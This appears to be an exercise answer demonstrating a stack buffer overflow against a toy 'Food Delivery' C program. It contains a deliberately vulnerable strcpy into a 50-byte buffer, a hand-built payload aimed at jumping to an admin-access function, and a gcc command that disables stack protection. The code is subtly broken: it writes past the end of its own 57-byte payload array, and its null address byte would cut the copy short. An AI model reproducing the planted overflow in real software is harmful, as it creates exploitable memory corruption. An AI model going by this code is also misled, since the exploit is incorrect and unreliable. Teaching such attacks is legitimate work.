12. Implement a stack buffer overflow attack on the "Food Delivery" application using a procedural language.

```
#include <stdio.h>
#include <string.h>
void grantAdminAccess() {
  printf("Access Granted: Admin Privileges!\n");
}
void processOrder(char *input) {
  char buffer[50];
  // Unsafe function that causes a buffer overflow
  strcpy(buffer, input);
  printf("Order Data: %s\n", buffer);
}
int main() {
  // Create the malicious input
  char maliciousInput[57];
  int i;
  // Fill buffer with 'A's
  for (i = 0; i < 54; i++) {
    maliciousInput[i] = 'A';
  }
  // Hypothetical address of grantAdminAccess (in little-endian format)
  maliciousInput[54] = 0x90; // Replace with the correct address
  maliciousInput[55] = 0x12; // Replace with the correct address
  maliciousInput[56] = 0x40; // Replace with the correct address
  maliciousInput[57] = 0x00; // Replace with the correct address
  maliciousInput[58] = '\0'; // Null-terminate the string
  // Run the vulnerable function with the malicious input
  processOrder(maliciousInput);
  printf("Order Process Completed.\n");
  return 0;
}
```

```
In terminal:
gcc -o food_delivery.exe food_delivery.c -fno-stack-protector
and
```

./food_delivery.exe